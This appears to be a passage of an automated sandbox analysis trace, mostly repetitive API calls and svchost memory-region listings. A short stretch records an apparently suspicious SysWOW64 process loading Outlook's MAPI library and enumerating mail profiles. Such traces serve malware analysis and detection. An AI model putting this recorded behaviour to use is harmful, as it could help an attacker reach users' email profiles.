[0252.354] SetLastError (dwErrCode=0x0) [0252.354] GetLastError () returned 0x0 [0252.354] SetLastError (dwErrCode=0x0) [0252.354] GetLastError () returned 0x0 [0252.354] SetLastError (dwErrCode=0x0) [0252.354] GetLastError () returned 0x0 [0252.354] SetLastError (dwErrCode=0x0) [0252.354] GetLastError () returned 0x0 [0252.354] SetLastError (dwErrCode=0x0) [0252.354] GetLastError () returned 0x0 [0252.354] SetLastError (dwErrCode=0x0) [0252.354] GetLastError () returned 0x0 [0252.354] SetLastError (dwErrCode=0x0) [0252.354] GetLastError () returned 0x0 [0252.354] SetLastError (dwErrCode=0x0) [0252.354] GetLastError () returned 0x0 [0252.354] SetLastError (dwErrCode=0x0) [0252.354] GetLastError () returned 0x0 [0252.354] SetLastError (dwErrCode=0x0) [0252.354] GetLastError () returned 0x0 [0252.354] SetLastError (dwErrCode=0x0) [0252.354] GetLastError () returned 0x0 [0252.354] SetLastError (dwErrCode=0x0) [0252.354] GetLastError () returned 0x0 [0252.354] SetLastError (dwErrCode=0x0) [0252.354] GetLastError () returned 0x0 [0252.354] SetLastError (dwErrCode=0x0) [0252.354] GetLastError () returned 0x0 [0252.354] SetLastError (dwErrCode=0x0) [0252.354] GetLastError () returned 0x0 [0252.354] SetLastError (dwErrCode=0x0) [0252.354] GetLastError () returned 0x0 [0252.354] SetLastError (dwErrCode=0x0) [0252.354] GetLastError () returned 0x0 [0252.354] SetLastError (dwErrCode=0x0) [0252.354] GetLastError () returned 0x0 [0252.354] SetLastError (dwErrCode=0x0) [0252.354] GetLastError () returned 0x0 [0252.354] SetLastError (dwErrCode=0x0) [0252.354] GetLastError () returned 0x0 [0252.354] SetLastError (dwErrCode=0x0) [0252.354] GetLastError () returned 0x0 [0252.354] SetLastError (dwErrCode=0x0) [0252.354] GetLastError () returned 0x0 [0252.354] SetLastError (dwErrCode=0x0) [0252.354] GetLastError () returned 0x0 [0252.355] SetLastError (dwErrCode=0x0) [0252.355] GetLastError () returned 0x0 [0252.355] SetLastError (dwErrCode=0x0) [0252.355] GetLastError () returned 0x0 [0252.355] SetLastError (dwErrCode=0x0) [0252.355] GetLastError () returned 0x0 [0252.355] SetLastError (dwErrCode=0x0) [0252.355] GetLastError () returned 0x0 [0252.355] SetLastError (dwErrCode=0x0) [0252.355] GetLastError () returned 0x0 [0252.355] SetLastError (dwErrCode=0x0) [0252.355] GetLastError () returned 0x0 [0252.355] SetLastError (dwErrCode=0x0) [0252.355] GetLastError () returned 0x0 [0252.355] SetLastError (dwErrCode=0x0) [0252.355] GetLastError () returned 0x0 [0252.355] SetLastError (dwErrCode=0x0) [0252.355] GetLastError () returned 0x0 [0252.355] SetLastError (dwErrCode=0x0) [0252.355] GetLastError () returned 0x0 [0252.355] SetLastError (dwErrCode=0x0) [0252.355] GetLastError () returned 0x0 [0252.355] SetLastError (dwErrCode=0x0) [0252.355] GetLastError () returned 0x0 [0252.355] SetLastError (dwErrCode=0x0) [0252.355] GetLastError () returned 0x0 [0252.355] SetLastError (dwErrCode=0x0) [0252.355] GetLastError () returned 0x0 [0252.355] SetLastError (dwErrCode=0x0) [0252.355] GetLastError () returned 0x0 [0252.355] SetLastError (dwErrCode=0x0) [0252.355] GetLastError () returned 0x0 [0252.355] SetLastError (dwErrCode=0x0) [0252.355] GetLastError () returned 0x0 [0252.355] SetLastError (dwErrCode=0x0) [0252.355] GetLastError () returned 0x0 [0252.355] SetLastError (dwErrCode=0x0) [0252.355] GetLastError () returned 0x0 [0252.355] SetLastError (dwErrCode=0x0) [0252.355] GetLastError () returned 0x0 [0252.355] SetLastError (dwErrCode=0x0) [0252.355] GetLastError () returned 0x0 [0252.355] SetLastError (dwErrCode=0x0) [0252.355] GetLastError () returned 0x0 [0252.356] SetLastError (dwErrCode=0x0) [0252.356] GetLastError () returned 0x0 [0252.356] SetLastError (dwErrCode=0x0) [0252.356] GetLastError () returned 0x0 [0252.356] SetLastError (dwErrCode=0x0) [0252.356] GetLastError () returned 0x0 [0252.356] SetLastError (dwErrCode=0x0) [0252.356] GetLastError () returned 0x0 [0252.356] SetLastError (dwErrCode=0x0) [0252.356] GetLastError () returned 0x0 [0252.356] SetLastError (dwErrCode=0x0) [0252.356] GetLastError () returned 0x0 [0252.356] SetLastError (dwErrCode=0x0) [0252.356] GetLastError () returned 0x0 [0252.356] SetLastError (dwErrCode=0x0) [0252.356] GetLastError () returned 0x0 [0252.356] SetLastError (dwErrCode=0x0) [0252.356] GetLastError () returned 0x0 [0252.356] SetLastError (dwErrCode=0x0) [0252.356] GetLastError () returned 0x0 [0252.356] SetLastError (dwErrCode=0x0) [0252.356] GetLastError () returned 0x0 [0252.356] SetLastError (dwErrCode=0x0) [0252.356] GetLastError () returned 0x0 [0252.356] SetLastError (dwErrCode=0x0) [0252.356] GetLastError () returned 0x0 [0252.356] SetLastError (dwErrCode=0x0) [0252.356] GetLastError () returned 0x0 [0252.356] SetLastError (dwErrCode=0x0) [0252.356] GetLastError () returned 0x0 [0252.356] SetLastError (dwErrCode=0x0) [0252.357] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1400064a8) returned 0x0 [0252.357] GetLastError () returned 0x0 [0252.357] SetLastError (dwErrCode=0x0) [0252.357] GetLastError () returned 0x0 [0252.357] SetLastError (dwErrCode=0x0) [0252.357] GetLastError () returned 0x0 [0252.358] SetLastError (dwErrCode=0x0) [0252.358] GetLastError () returned 0x0 [0252.358] SetLastError (dwErrCode=0x0) [0252.358] GetLastError () returned 0x0 [0252.358] SetLastError (dwErrCode=0x0) [0252.358] GetLastError () returned 0x0 [0252.358] SetLastError (dwErrCode=0x0) [0252.358] GetLastError () returned 0x0 [0252.358] SetLastError (dwErrCode=0x0) [0252.358] GetLastError () returned 0x0 [0252.358] SetLastError (dwErrCode=0x0) [0252.358] GetLastError () returned 0x0 [0252.358] SetLastError (dwErrCode=0x0) [0252.358] GetLastError () returned 0x0 [0252.358] SetLastError (dwErrCode=0x0) [0252.358] GetLastError () returned 0x0 [0252.358] SetLastError (dwErrCode=0x0) [0252.358] GetLastError () returned 0x0 [0252.358] SetLastError (dwErrCode=0x0) [0252.358] GetLastError () returned 0x0 [0252.358] SetLastError (dwErrCode=0x0) [0252.358] GetLastError () returned 0x0 [0252.358] SetLastError (dwErrCode=0x0) [0252.358] GetLastError () returned 0x0 [0252.358] SetLastError (dwErrCode=0x0) [0252.358] GetLastError () returned 0x0 [0252.358] SetLastError (dwErrCode=0x0) [0252.358] GetLastError () returned 0x0 [0252.358] SetLastError (dwErrCode=0x0) [0252.358] GetLastError () returned 0x0 [0252.358] SetLastError (dwErrCode=0x0) [0252.358] GetLastError () returned 0x0 [0252.358] SetLastError (dwErrCode=0x0) [0252.358] GetLastError () returned 0x0 [0252.358] SetLastError (dwErrCode=0x0) [0252.358] GetLastError () returned 0x0 [0252.358] SetLastError (dwErrCode=0x0) [0252.358] GetLastError () returned 0x0 [0252.359] SetLastError (dwErrCode=0x0) [0252.359] GetLastError () returned 0x0 [0252.359] SetLastError (dwErrCode=0x0) [0252.359] GetLastError () returned 0x0 [0252.359] SetLastError (dwErrCode=0x0) [0252.359] GetLastError () returned 0x0 [0252.359] SetLastError (dwErrCode=0x0) [0252.359] GetLastError () returned 0x0 [0252.359] SetLastError (dwErrCode=0x0) [0252.359] GetLastError () returned 0x0 [0252.359] SetLastError (dwErrCode=0x0) [0252.359] GetLastError () returned 0x0 [0252.359] SetLastError (dwErrCode=0x0) [0252.359] GetLastError () returned 0x0 [0252.359] SetLastError (dwErrCode=0x0) [0252.359] GetLastError () returned 0x0 [0252.359] SetLastError (dwErrCode=0x0) [0252.359] GetLastError () returned 0x0 [0252.359] SetLastError (dwErrCode=0x0) [0252.359] GetLastError () returned 0x0 [0252.359] SetLastError (dwErrCode=0x0) [0252.359] GetLastError () returned 0x0 [0252.359] SetLastError (dwErrCode=0x0) [0252.359] GetLastError () returned 0x0 [0252.359] SetLastError (dwErrCode=0x0) [0252.359] GetLastError () returned 0x0 [0252.359] SetLastError (dwErrCode=0x0) [0252.359] GetLastError () returned 0x0 [0252.359] SetLastError (dwErrCode=0x0) [0252.359] GetLastError () returned 0x0 [0252.359] SetLastError (dwErrCode=0x0) [0252.359] GetLastError () returned 0x0 [0252.359] SetLastError (dwErrCode=0x0) [0252.359] GetLastError () returned 0x0 [0252.359] SetLastError (dwErrCode=0x0) [0252.359] GetLastError () returned 0x0 [0252.359] SetLastError (dwErrCode=0x0) [0252.359] GetLastError () returned 0x0 [0252.360] SetLastError (dwErrCode=0x0) [0252.360] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x7fff9c8f0000 [0252.360] LoadLibraryW (lpLibFileName="ole32.dll") returned 0x7fff9e040000 [0252.365] LoadLibraryW (lpLibFileName="api-ms-win-core-com-l1-1-0.DLL") returned 0x7fff9e580000 [0252.365] GetCommandLineW () returned="\"C:\\Windows\\SysWOW64\\indexerneutralb.exe\" \"C:\\Windows\\TEMP\\3267.tmp\"" [0252.365] CommandLineToArgvW (in: lpCmdLine="\"C:\\Windows\\SysWOW64\\indexerneutralb.exe\" \"C:\\Windows\\TEMP\\3267.tmp\"", pNumArgs=0xe68b02f7f0 | out: pNumArgs=0xe68b02f7f0) returned 0xe68b0a2090*="C:\\Windows\\SysWOW64\\indexerneutralb.exe" [0252.365] RegCreateKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Clients\\Mail\\Microsoft Outlook", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x1, lpSecurityAttributes=0x0, phkResult=0xe68b02f7e0, lpdwDisposition=0x0 | out: phkResult=0xe68b02f7e0*=0x128, lpdwDisposition=0x0) returned 0x0 [0252.365] RegQueryValueExW (in: hKey=0x128, lpValueName="DLLPathEx", lpReserved=0x0, lpType=0x0, lpData=0xe68b02f800, lpcbData=0xe68b02f7b0*=0x104 | out: lpType=0x0, lpData=0xe68b02f800*=0x43, lpcbData=0xe68b02f7b0*=0xc2) returned 0x0 [0252.366] RegCloseKey (hKey=0x128) returned 0x0 [0252.366] LoadLibraryW (lpLibFileName="C:\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\system\\msmapi\\1033\\msmapi32.dll") returned 0x7fff98390000 [0252.716] CreateFileW (lpFileName="C:\\Windows\\TEMP\\3267.tmp" (normalized: "c:\\windows\\temp\\3267.tmp"), dwDesiredAccess=0x4, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0253.039] MAPIInitialize (lpMapiInit=0x0) returned 0x0 [0292.608] MAPIAdminProfiles (in: ulFlags=0x0, lppProfAdmin=0xe68b02f098 | out: lppProfAdmin=0xe68b02f098) returned 0x0 [0292.609] MAPIFreeBuffer (lpBuffer=0xe68bc55b10) returned 0x0 [0292.609] MAPIUninitialize () [0295.683] CloseHandle (hObject=0x130) returned 1 [0295.684] FreeLibrary (hLibModule=0x7fff98390000) returned 1 [0295.685] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0xe68b02f9b8 | out: phModule=0xe68b02f9b8) returned 0 [0295.685] ExitProcess (uExitCode=0x0) Thread: id = 531 os_tid = 0x548 Thread: id = 533 os_tid = 0x454 Thread: id = 537 os_tid = 0x838 Thread: id = 538 os_tid = 0xb28 Thread: id = 542 os_tid = 0x6a4 Thread: id = 543 os_tid = 0x2ec Thread: id = 544 os_tid = 0x6a0 Thread: id = 547 os_tid = 0x76c Thread: id = 548 os_tid = 0xb68 Thread: id = 550 os_tid = 0xb34 Thread: id = 552 os_tid = 0xb24 Thread: id = 554 os_tid = 0xb38 Thread: id = 557 os_tid = 0xb18 Thread: id = 583 os_tid = 0xc18 Thread: id = 584 os_tid = 0xc24 Thread: id = 586 os_tid = 0xc2c Process: id = "32" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x11082000" os_pid = "0x388" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "31" os_parent_pid = "0x538" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AJRouter" [0xa], "NT SERVICE\\bthserv" [0xa], "NT SERVICE\\CDPSvc" [0xa], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\FontCache" [0xa], "NT SERVICE\\LicenseManager" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\RemoteRegistry" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT SERVICE\\workfolderssvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000e891" [0xc000000f], "LOCAL" [0x7] Region: id = 4572 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4573 start_va = 0x4d38d0000 end_va = 0x4d38dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000004d38d0000" filename = "" Region: id = 4574 start_va = 0x4d38e0000 end_va = 0x4d38e0fff entry_point = 0x4d38e0000 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 4575 start_va = 0x4d38f0000 end_va = 0x4d3903fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000004d38f0000" filename = "" Region: id = 4576 start_va = 0x4d3910000 end_va = 0x4d398ffff entry_point = 0x0 region_type = private name = "private_0x00000004d3910000" filename = "" Region: id = 4577 start_va = 0x4d3990000 end_va = 0x4d3993fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000004d3990000" filename = "" Region: id = 4578 start_va = 0x4d39a0000 end_va = 0x4d39a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000004d39a0000" filename = "" Region: id = 4579 start_va = 0x4d39b0000 end_va = 0x4d39b1fff entry_point = 0x0 region_type = private name = "private_0x00000004d39b0000" filename = "" Region: id = 4580 start_va = 0x4d39c0000 end_va = 0x4d3a7dfff entry_point = 0x4d39c0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4581 start_va = 0x4d3a80000 end_va = 0x4d3a80fff entry_point = 0x0 region_type = private name = "private_0x00000004d3a80000" filename = "" Region: id = 4582 start_va = 0x4d3a90000 end_va = 0x4d3a90fff entry_point = 0x0 region_type = private name = "private_0x00000004d3a90000" filename = "" Region: id = 4583 start_va = 0x4d3aa0000 end_va = 0x4d3aa0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000004d3aa0000" filename = "" Region: id = 4584 start_va = 0x4d3ab0000 end_va = 0x4d3ac1fff entry_point = 0x4d3ab0000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 4585 start_va = 0x4d3ad0000 end_va = 0x4d3ad4fff entry_point = 0x4d3ad0000 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb") Region: id = 4586 start_va = 0x4d3ae0000 end_va = 0x4d3ae6fff entry_point = 0x0 region_type = private name = "private_0x00000004d3ae0000" filename = "" Region: id = 4587 start_va = 0x4d3af0000 end_va = 0x4d3af1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000004d3af0000" filename = "" Region: id = 4588 start_va = 0x4d3b00000 end_va = 0x4d3bfffff entry_point = 0x0 region_type = private name = "private_0x00000004d3b00000" filename = "" Region: id = 4589 start_va = 0x4d3c00000 end_va = 0x4d3c23fff entry_point = 0x4d3c00000 region_type = mapped_file name = "segmdl2.ttf" filename = "\\Windows\\Fonts\\segmdl2.ttf" (normalized: "c:\\windows\\fonts\\segmdl2.ttf") Region: id = 4590 start_va = 0x4d3c80000 end_va = 0x4d3cfffff entry_point = 0x0 region_type = private name = "private_0x00000004d3c80000" filename = "" Region: id = 4591 start_va = 0x4d3d00000 end_va = 0x4d3d01fff entry_point = 0x4d3d00000 region_type = mapped_file name = "netprofmsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\netprofmsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netprofmsvc.dll.mui") Region: id = 4592 start_va = 0x4d3d10000 end_va = 0x4d3d10fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000004d3d10000" filename = "" Region: id = 4593 start_va = 0x4d3d20000 end_va = 0x4d3d26fff entry_point = 0x0 region_type = private name = "private_0x00000004d3d20000" filename = "" Region: id = 4594 start_va = 0x4d3d30000 end_va = 0x4d3deffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000004d3d30000" filename = "" Region: id = 4595 start_va = 0x4d3e00000 end_va = 0x4d3efffff entry_point = 0x0 region_type = private name = "private_0x00000004d3e00000" filename = "" Region: id = 4596 start_va = 0x4d3f00000 end_va = 0x4d4087fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000004d3f00000" filename = "" Region: id = 4597 start_va = 0x4d4090000 end_va = 0x4d4210fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000004d4090000" filename = "" Region: id = 4598 start_va = 0x4d4220000 end_va = 0x4d431ffff entry_point = 0x0 region_type = private name = "private_0x00000004d4220000" filename = "" Region: id = 4599 start_va = 0x4d4320000 end_va = 0x4d4656fff entry_point = 0x4d4320000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4600 start_va = 0x4d4660000 end_va = 0x4d475ffff entry_point = 0x0 region_type = private name = "private_0x00000004d4660000" filename = "" Region: id = 4601 start_va = 0x4d4760000 end_va = 0x4d485ffff entry_point = 0x0 region_type = private name = "private_0x00000004d4760000" filename = "" Region: id = 4602 start_va = 0x4d4860000 end_va = 0x4d495ffff entry_point = 0x0 region_type = private name = "private_0x00000004d4860000" filename = "" Region: id = 4603 start_va = 0x4d4960000 end_va = 0x4d4a5ffff entry_point = 0x0 region_type = private name = "private_0x00000004d4960000" filename = "" Region: id = 4604 start_va = 0x4d4a60000 end_va = 0x4d4b5ffff entry_point = 0x0 region_type = private name = "private_0x00000004d4a60000" filename = "" Region: id = 4605 start_va = 0x4d4b60000 end_va = 0x4d4c5ffff entry_point = 0x0 region_type = private name = "private_0x00000004d4b60000" filename = "" Region: id = 4606 start_va = 0x4d4c60000 end_va = 0x4d4d5ffff entry_point = 0x0 region_type = private name = "private_0x00000004d4c60000" filename = "" Region: id = 4607 start_va = 0x4d4d60000 end_va = 0x4d5d5ffff entry_point = 0x4d4d60000 region_type = mapped_file name = "~fontcache-fontface.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-FontFace.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-fontface.dat") Region: id = 4608 start_va = 0x4d5d90000 end_va = 0x4d5e05fff entry_point = 0x4d5d90000 region_type = mapped_file name = "~fontcache-system.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-System.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-system.dat") Region: id = 4609 start_va = 0x4d5e40000 end_va = 0x4d5f3ffff entry_point = 0x0 region_type = private name = "private_0x00000004d5e40000" filename = "" Region: id = 4610 start_va = 0x4d5f40000 end_va = 0x4d603ffff entry_point = 0x0 region_type = private name = "private_0x00000004d5f40000" filename = "" Region: id = 4611 start_va = 0x4d6040000 end_va = 0x4d613ffff entry_point = 0x0 region_type = private name = "private_0x00000004d6040000" filename = "" Region: id = 4612 start_va = 0x4d61a0000 end_va = 0x4d61a6fff entry_point = 0x0 region_type = private name = "private_0x00000004d61a0000" filename = "" Region: id = 4613 start_va = 0x4d6200000 end_va = 0x4d62fffff entry_point = 0x0 region_type = private name = "private_0x00000004d6200000" filename = "" Region: id = 4614 start_va = 0x4d6300000 end_va = 0x4d63fffff entry_point = 0x0 region_type = private name = "private_0x00000004d6300000" filename = "" Region: id = 4615 start_va = 0x4d6470000 end_va = 0x4d656ffff entry_point = 0x0 region_type = private name = "private_0x00000004d6470000" filename = "" Region: id = 4616 start_va = 0x4d6570000 end_va = 0x4d664efff entry_point = 0x4d6570000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 4617 start_va = 0x4d6650000 end_va = 0x4d674ffff entry_point = 0x0 region_type = private name = "private_0x00000004d6650000" filename = "" Region: id = 4618 start_va = 0x4d6750000 end_va = 0x4d684ffff entry_point = 0x0 region_type = private name = "private_0x00000004d6750000" filename = "" Region: id = 4619 start_va = 0x4d6850000 end_va = 0x4d694ffff entry_point = 0x0 region_type = private name = "private_0x00000004d6850000" filename = "" Region: id = 4620 start_va = 0x4d69f0000 end_va = 0x4d6aeffff entry_point = 0x0 region_type = private name = "private_0x00000004d69f0000" filename = "" Region: id = 4621 start_va = 0x4d6af0000 end_va = 0x4d6beffff entry_point = 0x0 region_type = private name = "private_0x00000004d6af0000" filename = "" Region: id = 4622 start_va = 0x4d6bf0000 end_va = 0x4d6ceffff entry_point = 0x0 region_type = private name = "private_0x00000004d6bf0000" filename = "" Region: id = 4623 start_va = 0x4d6d00000 end_va = 0x4d6dfffff entry_point = 0x0 region_type = private name = "private_0x00000004d6d00000" filename = "" Region: id = 4624 start_va = 0x4d6e00000 end_va = 0x4d6efffff entry_point = 0x0 region_type = private name = "private_0x00000004d6e00000" filename = "" Region: id = 4625 start_va = 0x4d6f50000 end_va = 0x4d704ffff entry_point = 0x0 region_type = private name = "private_0x00000004d6f50000" filename = "" Region: id = 4626 start_va = 0x4d7050000 end_va = 0x4d714ffff entry_point = 0x0 region_type = private name = "private_0x00000004d7050000" filename = "" Region: id = 4627 start_va = 0x4d7200000 end_va = 0x4d72fffff entry_point = 0x0 region_type = private name = "private_0x00000004d7200000" filename = "" Region: id = 4628 start_va = 0x4d7300000 end_va = 0x4d73fffff entry_point = 0x0 region_type = private name = "private_0x00000004d7300000" filename = "" Region: id = 4629 start_va = 0x4d7400000 end_va = 0x4d74fffff entry_point = 0x0 region_type = private name = "private_0x00000004d7400000" filename = "" Region: id = 4630 start_va = 0x4d7500000 end_va = 0x4d75fffff entry_point = 0x0 region_type = private name = "private_0x00000004d7500000" filename = "" Region: id = 4631 start_va = 0x4d7600000 end_va = 0x4d76fffff entry_point = 0x0 region_type = private name = "private_0x00000004d7600000" filename = "" Region: id = 4632 start_va = 0x4d7700000 end_va = 0x4d77defff entry_point = 0x4d7700000 region_type = mapped_file name = "segoeui.ttf" filename = "\\Windows\\Fonts\\segoeui.ttf" (normalized: "c:\\windows\\fonts\\segoeui.ttf") Region: id = 4633 start_va = 0x4d80b0000 end_va = 0x4d81affff entry_point = 0x0 region_type = private name = "private_0x00000004d80b0000" filename = "" Region: id = 4634 start_va = 0x4d81b0000 end_va = 0x4d89affff entry_point = 0x4d81b0000 region_type = mapped_file name = "~fontcache-s-1-5-21-1462094071-1423818996-289466292-1000.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-S-1-5-21-1462094071-1423818996-289466292-1000.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-s-1-5-21-1462094071-1423818996-289466292-1000.dat") Region: id = 4635 start_va = 0x4d8a00000 end_va = 0x4d8afffff entry_point = 0x0 region_type = private name = "private_0x00000004d8a00000" filename = "" Region: id = 4636 start_va = 0x7df5ff2c0000 end_va = 0x7ff5ff2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff2c0000" filename = "" Region: id = 4637 start_va = 0x7ff70e79a000 end_va = 0x7ff70e79bfff entry_point = 0x0 region_type = private name = "private_0x00007ff70e79a000" filename = "" Region: id = 4638 start_va = 0x7ff70e79c000 end_va = 0x7ff70e79dfff entry_point = 0x0 region_type = private name = "private_0x00007ff70e79c000" filename = "" Region: id = 4639 start_va = 0x7ff70e79e000 end_va = 0x7ff70e79ffff entry_point = 0x0 region_type = private name = "private_0x00007ff70e79e000" filename = "" Region: id = 4640 start_va = 0x7ff70e7a0000 end_va = 0x7ff70e7a1fff entry_point = 0x0 region_type = private name = "private_0x00007ff70e7a0000" filename = "" Region: id = 4641 start_va = 0x7ff70e7a2000 end_va = 0x7ff70e7a3fff entry_point = 0x0 region_type = private name = "private_0x00007ff70e7a2000" filename = "" Region: id = 4642 start_va = 0x7ff70e7a4000 end_va = 0x7ff70e7a5fff entry_point = 0x0 region_type = private name = "private_0x00007ff70e7a4000" filename = "" Region: id = 4643 start_va = 0x7ff70e7a6000 end_va = 0x7ff70e7a7fff entry_point = 0x0 region_type = private name = "private_0x00007ff70e7a6000" filename = "" Region: id = 4644 start_va = 0x7ff70e7a8000 end_va = 0x7ff70e7a9fff entry_point = 0x0 region_type = private name = "private_0x00007ff70e7a8000" filename = "" Region: id = 4645 start_va = 0x7ff70e7aa000 end_va = 0x7ff70e7abfff entry_point = 0x0 region_type = private name = "private_0x00007ff70e7aa000" filename = "" Region: id = 4646 start_va = 0x7ff70e7ac000 end_va = 0x7ff70e7adfff entry_point = 0x0 region_type = private name = "private_0x00007ff70e7ac000" filename = "" Region: id = 4647 start_va = 0x7ff70e7ae000 end_va = 0x7ff70e7affff entry_point = 0x0 region_type = private name = "private_0x00007ff70e7ae000" filename = "" Region: id = 4648 start_va = 0x7ff70e7b0000 end_va = 0x7ff70e7b1fff entry_point = 0x0 region_type = private name = "private_0x00007ff70e7b0000" filename = "" Region: id = 4649 start_va = 0x7ff70e7b2000 end_va = 0x7ff70e7b3fff entry_point = 0x0 region_type = private name = "private_0x00007ff70e7b2000" filename = "" Region: id = 4650 start_va = 0x7ff70e7b4000 end_va = 0x7ff70e7b5fff entry_point = 0x0 region_type = private name = "private_0x00007ff70e7b4000" filename = "" Region: id = 4651 start_va = 0x7ff70e7b6000 end_va = 0x7ff70e7b7fff entry_point = 0x0 region_type = private name = "private_0x00007ff70e7b6000" filename = "" Region: id = 4652 start_va = 0x7ff70e7b8000 end_va = 0x7ff70e7b9fff entry_point = 0x0 region_type = private name = "private_0x00007ff70e7b8000" filename = "" Region: id = 4653 start_va = 0x7ff70e7ba000 end_va = 0x7ff70e7bbfff entry_point = 0x0 region_type = private name = "private_0x00007ff70e7ba000" filename = "" Region: id = 4654 start_va = 0x7ff70e7bc000 end_va = 0x7ff70e7bdfff entry_point = 0x0 region_type = private name = "private_0x00007ff70e7bc000" filename = "" Region: id = 4655 start_va = 0x7ff70e7be000 end_va = 0x7ff70e7bffff entry_point = 0x0 region_type = private name = "private_0x00007ff70e7be000" filename = "" Region: id = 4656 start_va = 0x7ff70e7c0000 end_va = 0x7ff70e8bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff70e7c0000" filename = "" Region: id = 4657 start_va = 0x7ff70e8c0000 end_va = 0x7ff70e8e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff70e8c0000" filename = "" Region: id = 4658 start_va = 0x7ff70e8e4000 end_va = 0x7ff70e8e5fff entry_point = 0x0 region_type = private name = "private_0x00007ff70e8e4000" filename = "" Region: id = 4659 start_va = 0x7ff70e8e6000 end_va = 0x7ff70e8e7fff entry_point = 0x0 region_type = private name = "private_0x00007ff70e8e6000" filename = "" Region: id = 4660 start_va = 0x7ff70e8e8000 end_va = 0x7ff70e8e9fff entry_point = 0x0 region_type = private name = "private_0x00007ff70e8e8000" filename = "" Region: id = 4661 start_va = 0x7ff70e8ea000 end_va = 0x7ff70e8eafff entry_point = 0x0 region_type = private name = "private_0x00007ff70e8ea000" filename = "" Region: id = 4662 start_va = 0x7ff70e8ec000 end_va = 0x7ff70e8edfff entry_point = 0x0 region_type = private name = "private_0x00007ff70e8ec000" filename = "" Region: id = 4663 start_va = 0x7ff70e8ee000 end_va = 0x7ff70e8effff entry_point = 0x0 region_type = private name = "private_0x00007ff70e8ee000" filename = "" Region: id = 4664 start_va = 0x7ff70e990000 end_va = 0x7ff70e99cfff entry_point = 0x7ff70e990000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 4665 start_va = 0x7fff93260000 end_va = 0x7fff9327dfff entry_point = 0x7fff93260000 region_type = mapped_file name = "bluetoothapis.dll" filename = "\\Windows\\System32\\BluetoothApis.dll" (normalized: "c:\\windows\\system32\\bluetoothapis.dll") Region: id = 4666 start_va = 0x7fff93280000 end_va = 0x7fff9328cfff entry_point = 0x7fff93280000 region_type = mapped_file name = "bthtelemetry.dll" filename = "\\Windows\\System32\\BthTelemetry.dll" (normalized: "c:\\windows\\system32\\bthtelemetry.dll") Region: id = 4667 